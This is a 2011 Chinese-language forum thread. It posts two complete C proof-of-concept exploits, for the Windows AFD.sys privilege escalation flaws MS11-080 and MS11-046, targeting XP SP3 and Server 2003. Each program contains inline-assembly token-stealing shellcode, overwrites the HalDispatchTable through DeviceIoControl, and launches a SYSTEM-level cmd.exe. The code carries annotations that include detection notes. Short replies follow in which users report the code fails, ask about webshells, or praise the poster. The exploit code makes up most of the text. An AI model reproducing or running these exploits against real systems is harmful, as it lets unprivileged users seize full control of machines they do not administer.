
MS11-080、MS11-046两个提权代码 [复制链接]


发表于 2011-12-1 20:06:19 |显示全部楼层
本帖最后由 KiDebug 于 2011-12-1 20:07 编辑

拿着大牛写的代码自己弹CMD玩,多多包涵。。
  1. /*
  2. * MS11-080 Afd.sys Privilege Escalation Exploit
  3. * 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/
  4. * 改编:KiDebug,Google@pku.edu.cn
  5. * 编译:VC6.0
  6. * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
  7. */
  8. #include <stdio.h>
  9. #include <Winsock2.h>
  10. #include <windows.h>
  11. #pragma comment (lib, "ws2_32.lib")

  /*
   * Undocumented record layout returned by NtQuerySystemInformation(SystemModuleInformation).
   * Field order and sizes must match the kernel's RTL_PROCESS_MODULE_INFORMATION exactly;
   * main() reads Modules[0].ImageBase as the kernel (ntoskrnl) load address and
   * FullPathName + OffsetToFileName as the bare file name it hands to LoadLibraryA.
   */
  typedef struct _RTL_PROCESS_MODULE_INFORMATION {
      HANDLE Section;                 // Not filled in
      PVOID MappedBase;
      PVOID ImageBase;                // kernel-mode base address of the module
      ULONG ImageSize;
      ULONG Flags;
      USHORT LoadOrderIndex;
      USHORT InitOrderIndex;
      USHORT LoadCount;
      USHORT OffsetToFileName;        // offset of the file-name part inside FullPathName
      UCHAR  FullPathName[ 256 ];
  } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

  /*
   * Header of the SystemModuleInformation buffer. Only one entry is declared: main()
   * expects the call to fail with STATUS_INFO_LENGTH_MISMATCH and relies on Modules[0]
   * (the kernel image) being filled in regardless.
   */
  typedef struct _RTL_PROCESS_MODULES {
      ULONG NumberOfModules;
      RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
  } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

  /* Native (ntdll) calls without import-library prototypes; resolved at run time via GetProcAddress. */
  typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
  typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
  typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
  NtQueryIntervalProfile_        NtQueryIntervalProfile;
  NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
  NtQuerySystemInformation_ NtQuerySystemInformation;

  /*
   * Kernel-mode addresses computed in main() (export RVA from a user-mode copy of ntoskrnl
   * rebased onto the real kernel base). ShellCode() reads the first three from inline asm;
   * WriteToHalDispatchTable is the address the DeviceIoControl call in main() overwrites.
   */
  ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

  /*
   * Kernel-mode payload. main() copies it to user memory and points a HalDispatchTable
   * entry at it, so it executes in ring 0 when NtQueryIntervalProfile() is called.
   * It copies the Token pointer of the System process (PsInitialSystemProcess) into the
   * EPROCESS of the calling process - the classic token-stealing payload.
   * _declspec(naked): no compiler prologue/epilogue; pushad/pushfd ... popfd/popad
   * restore the interrupted kernel register state before returning.
   */
  void _declspec(naked) ShellCode()
  {
      __asm
      {
          pushad
          pushfd
          mov esi,PsReferencePrimaryToken
  FindTokenOffset:
          lodsb                           // scan PsReferencePrimaryToken's code for the first 8Dh (lea) opcode
          cmp al, 8Dh;
          jnz FindTokenOffset
          mov edi,[esi+1]                 // the lea's displacement = offset of the Token field inside EPROCESS
          mov esi,PsInitialSystemProcess
          mov esi,[esi]                   // esi = EPROCESS of the System process
          push fs:[124h]                  // fs:[124h] is the current KTHREAD on 32-bit Windows
          mov eax,PsGetThreadProcess
          call eax                        // eax = EPROCESS of the current (calling) process
          add esi, edi                    // esi = &System->Token
          add edi, eax                    // edi = &Current->Token
          movsd                           // Current->Token = System->Token (one 32-bit copy)
          popfd
          popad
          ret
      }
  }



  /*
   * MS11-080 proof of concept (AFD.sys). Per the file header it was built with VC6 and
   * run as a standard user on Windows XP SP3 / 2003 SP2; per the author's closing comment
   * the result is a cmd.exe carrying the SYSTEM token. Both systems are long out of
   * support and the MS11-080 update closes the AFD code path used here.
   *
   * Behaviour worth a detection rule, all visible below: an unprivileged process that
   *   - queries SystemModuleInformation and then LoadLibraryA()s the kernel image path,
   *   - hands a socket handle to DeviceIoControl with an output buffer address in kernel space,
   *   - calls NtQueryIntervalProfile and immediately ShellExecute()s cmd.exe.
   *
   * Error handling is thin: every early return is silent, GetModuleHandle, WSAStartup and
   * socket() are unchecked, and a failed connect() only prints a message.
   * void main() is pre-standard VC6 usage.
   */
  void main( )
  {
      // Resolve the native calls from ntdll at run time.
      HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
      NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
      NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
      NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
      if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
          return;

      // Commit one RWX page at the bottom of the address space (BaseAddress 1 is rounded
      // down to a page boundary). (HANDLE)0xFFFFFFFF is the current-process pseudo-handle;
      // any non-zero NTSTATUS is treated as fatal.
      ULONG BaseAddress = 1 , RegionSize = 0x1000, status;
      status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
      if ( status )
          return;

      // Fetch ntoskrnl's module record; a single call is enough.
      ULONG NtoskrnlBase;
      RTL_PROCESS_MODULES module;
      status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
      // The one-entry buffer is too small for the whole list, so the expected status is
      // STATUS_INFO_LENGTH_MISMATCH; the code relies on Modules[0] (the kernel) being filled anyway.
      if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
          return;

      NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;   // kernel-mode base of ntoskrnl

      // Load ntoskrnl.exe into this process as an ordinary image so its exports can be looked up.
      HMODULE ntoskrnl;
      ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
      if ( ntoskrnl == NULL )
          return;

      // Compute the real kernel addresses: export RVA in the user-mode copy, rebased onto the kernel base.
      WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // the address to be overwritten (+4 = second table entry; the +2 is the author's choice and is not explained here)
      PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
      PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
      PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

      // From here on each exploit does its own thing (author's note).
      // Fixed-address RWX region filled with 0x90 (NOP) and ShellCode copied to 0x02080000: a NOP
      // slide. Hard-coded addresses assume no ASLR, which holds for the XP/2003 targets named above.
      if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
          return;

      memset((PVOID)0x02070000,0x90,0x20000);
      memcpy((PVOID)0x02080000,ShellCode,100);   // 100 is an unchecked upper bound on ShellCode's length

      WSADATA ws;

      SOCKET tcp_socket;
      struct sockaddr_in peer;
      ULONG  dwReturnSize;

      WSAStartup(0x0202,&ws);   // return value ignored

      peer.sin_family = AF_INET;
      peer.sin_port = htons(4455);
      peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

      tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);   // not checked for INVALID_SOCKET

      if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
      {
          printf("connect error\n");   // not fatal: execution continues with the same handle
      }

      // 25-byte request body (the literal's NUL makes 26) staged at fixed address 0x1000 on top
      // of 0x108 bytes of 0x45 filler; the IOCTL below is handed 0x108 bytes starting at 0x1004.
      UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
      memset((PVOID)0x1000,0x45,0x108);
      memcpy((PVOID)0x1000,buf1,25);

      // The socket handle goes straight to the AFD driver. The output buffer is the kernel
      // address computed above with output length 0 - this is the MS11-080 write into HalDispatchTable.
      if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
      {
          printf("error=%d\n", GetLastError());   // %d for a DWORD; %lu would match the type
      }

      // Trigger: NtQueryIntervalProfile dispatches through the overwritten HalDispatchTable entry
      // (running ShellCode in kernel mode), then a cmd.exe is started, now with the SYSTEM token.
      // 'status' is only reused as a dummy output argument here.
      NtQueryIntervalProfile( 2, &status );
      ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
      return;
  }
  1. /*
  2. * 触发MS11-046
  3. * 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html
  4. * 改编:KiDebug,Google@pku.edu.cn
  5. * 编译:VC6.0
  6. * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
  7. */
  8. #include <stdio.h>
  9. #include <Winsock2.h>
  10. #include <windows.h>
  11. #pragma comment (lib, "ws2_32.lib")

  /*
   * Undocumented record layout returned by NtQuerySystemInformation(SystemModuleInformation).
   * Field order and sizes must match the kernel's RTL_PROCESS_MODULE_INFORMATION exactly;
   * main() reads Modules[0].ImageBase as the kernel (ntoskrnl) load address and
   * FullPathName + OffsetToFileName as the bare file name it hands to LoadLibraryA.
   * Identical to the declarations in the MS11-080 listing above.
   */
  typedef struct _RTL_PROCESS_MODULE_INFORMATION {
      HANDLE Section;                 // Not filled in
      PVOID MappedBase;
      PVOID ImageBase;                // kernel-mode base address of the module
      ULONG ImageSize;
      ULONG Flags;
      USHORT LoadOrderIndex;
      USHORT InitOrderIndex;
      USHORT LoadCount;
      USHORT OffsetToFileName;        // offset of the file-name part inside FullPathName
      UCHAR  FullPathName[ 256 ];
  } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

  /*
   * Header of the SystemModuleInformation buffer. Only one entry is declared: main()
   * expects the call to fail with STATUS_INFO_LENGTH_MISMATCH and relies on Modules[0]
   * (the kernel image) being filled in regardless.
   */
  typedef struct _RTL_PROCESS_MODULES {
      ULONG NumberOfModules;
      RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
  } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

  /* Native (ntdll) calls without import-library prototypes; resolved at run time via GetProcAddress. */
  typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
  typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
  typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
  NtQueryIntervalProfile_        NtQueryIntervalProfile;
  NtAllocateVirtualMemory_ NtAllocateVirtualMemory;   // resolved but never called in this listing
  NtQuerySystemInformation_ NtQuerySystemInformation;

  /*
   * Kernel-mode addresses computed in main() (export RVA from a user-mode copy of ntoskrnl
   * rebased onto the real kernel base). ShellCode() reads the first three from inline asm;
   * WriteToHalDispatchTable is the address the DeviceIoControl call in main() overwrites.
   */
  ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

  /*
   * Kernel-mode payload, byte-for-byte the same as in the MS11-080 listing above.
   * main() copies it to user memory and points a HalDispatchTable entry at it, so it
   * executes in ring 0 when NtQueryIntervalProfile() is called. It copies the Token
   * pointer of the System process (PsInitialSystemProcess) into the EPROCESS of the
   * calling process - the classic token-stealing payload.
   * _declspec(naked): no compiler prologue/epilogue; pushad/pushfd ... popfd/popad
   * restore the interrupted kernel register state before returning.
   */
  void _declspec(naked) ShellCode()
  {
      __asm
      {
          pushad
          pushfd
          mov esi,PsReferencePrimaryToken
  FindTokenOffset:
          lodsb                           // scan PsReferencePrimaryToken's code for the first 8Dh (lea) opcode
          cmp al, 8Dh;
          jnz FindTokenOffset
          mov edi,[esi+1]                 // the lea's displacement = offset of the Token field inside EPROCESS
          mov esi,PsInitialSystemProcess
          mov esi,[esi]                   // esi = EPROCESS of the System process
          push fs:[124h]                  // fs:[124h] is the current KTHREAD on 32-bit Windows
          mov eax,PsGetThreadProcess
          call eax                        // eax = EPROCESS of the current (calling) process
          add esi, edi                    // esi = &System->Token
          add edi, eax                    // edi = &Current->Token
          movsd                           // Current->Token = System->Token (one 32-bit copy)
          popfd
          popad
          ret
      }
  }



  /*
   * MS11-046 proof of concept (AFD.sys). Up to and including the address computation this is
   * the same program as the MS11-080 listing above; only the AFD request differs (IOCTL
   * 0x12007 with a small stack buffer instead of 0x000120bb with a staged low-memory buffer)
   * and no low page is allocated. Per the file header it was built with VC6 and run as a
   * standard user on Windows XP SP3 / 2003 SP2; per the author's closing comment the result
   * is a cmd.exe carrying the SYSTEM token. Both systems are long out of support and the
   * MS11-046 update closes the AFD code path used here.
   *
   * Detection-relevant behaviour, all visible below: an unprivileged process that queries
   * SystemModuleInformation, LoadLibraryA()s the kernel image path, hands a socket handle to
   * DeviceIoControl with an output buffer in kernel space, then calls NtQueryIntervalProfile
   * and ShellExecute()s cmd.exe.
   *
   * Error handling is thin: every early return is silent, GetModuleHandle, WSAStartup and
   * socket() are unchecked, and a failed connect() only prints a message.
   */
  void main( )
  {
      // Resolve the native calls from ntdll at run time (NtAllocateVirtualMemory is never used here).
      HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
      NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
      NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
      NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
      if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
          return;

      // Fetch ntoskrnl's module record; a single call is enough.
      ULONG status, NtoskrnlBase;
      RTL_PROCESS_MODULES module;
      status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
      // The one-entry buffer is too small for the whole list, so the expected status is
      // STATUS_INFO_LENGTH_MISMATCH; the code relies on Modules[0] (the kernel) being filled anyway.
      if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
          return;

      NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;   // kernel-mode base of ntoskrnl

      // Load ntoskrnl.exe into this process as an ordinary image so its exports can be looked up.
      HMODULE ntoskrnl;
      ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
      if ( ntoskrnl == NULL )
          return;

      // Compute the real kernel addresses: export RVA in the user-mode copy, rebased onto the kernel base.
      WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // the address to be overwritten (+4 = second table entry; the +2 is the author's choice and is not explained here)
      PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
      PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
      PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

      // From here on each exploit does its own thing (author's note).
      // Fixed-address RWX region filled with 0x90 (NOP) and ShellCode copied to 0x02080000: a NOP
      // slide. Hard-coded addresses assume no ASLR, which holds for the XP/2003 targets named above.
      if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
          return;

      memset((PVOID)0x02070000,0x90,0x20000);
      memcpy((PVOID)0x02080000,ShellCode,100);   // 100 is an unchecked upper bound on ShellCode's length

      WSADATA ws;

      SOCKET tcp_socket;
      struct sockaddr_in peer;
      ULONG  dwReturnSize;

      WSAStartup(0x0202,&ws);   // return value ignored

      peer.sin_family = AF_INET;
      peer.sin_port = htons(0);
      peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

      tcp_socket = socket(AF_INET, SOCK_STREAM, 0);   // not checked for INVALID_SOCKET

      if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
      {
          printf("connect error\n");   // not fatal: execution continues with the same handle
      }

      // Request buffer: only buf[3] and buf[4] are set; the other DWORDs of the 0x60 bytes
      // passed below are uninitialized stack contents.
      DWORD buf[0x30];
      buf[3]=1;
      buf[4]=0x20;

      // The socket handle goes straight to the AFD driver. The output buffer is the kernel
      // address computed above with output length 0 - this is the MS11-046 write into HalDispatchTable.
      if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
      {
          printf("error=%d\n", GetLastError());   // %d for a DWORD; %lu would match the type
      }

      // Trigger: NtQueryIntervalProfile dispatches through the overwritten HalDispatchTable entry
      // (running ShellCode in kernel mode), then a cmd.exe is started, now with the SYSTEM token.
      // 'status' is only reused as a dummy output argument here.
      NtQueryIntervalProfile( 2, &status );
      ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
      return;
  }


发表于 2011-12-2 08:44:05 |显示全部楼层
请教一下webshell如何运作呢?


发表于 2011-12-2 21:40:17 |显示全部楼层
这个C的好像有点问题啊。执行不成功。


发表于 2011-12-2 21:48:36 |显示全部楼层
知道是好东西,啃不了


发表于 2011-12-3 19:29:33 |显示全部楼层
表示使用有错误无法运行


发表于 2011-12-6 10:45:50 |显示全部楼层
KiDebug,Google@pku.edu.cn
pku.edu!!!


发表于 2011-12-8 14:41:33 |显示全部楼层
北邮的牛人


发表于 2011-12-15 10:39:29 |显示全部楼层
error,error


发表于 2011-12-15 17:57:44 |显示全部楼层
这些ID都是些什么人?


发表于 2012-1-12 10:42:24 |显示全部楼层
好东西啊,拿来调一下看看先


发表于 2012-8-9 18:40:01 |显示全部楼层
好东西啊,拿来调一下看看先


发表于 2012-11-27 08:45:45 |显示全部楼层
win7?


发表于 2012-12-11 10:55:44 |显示全部楼层
有错误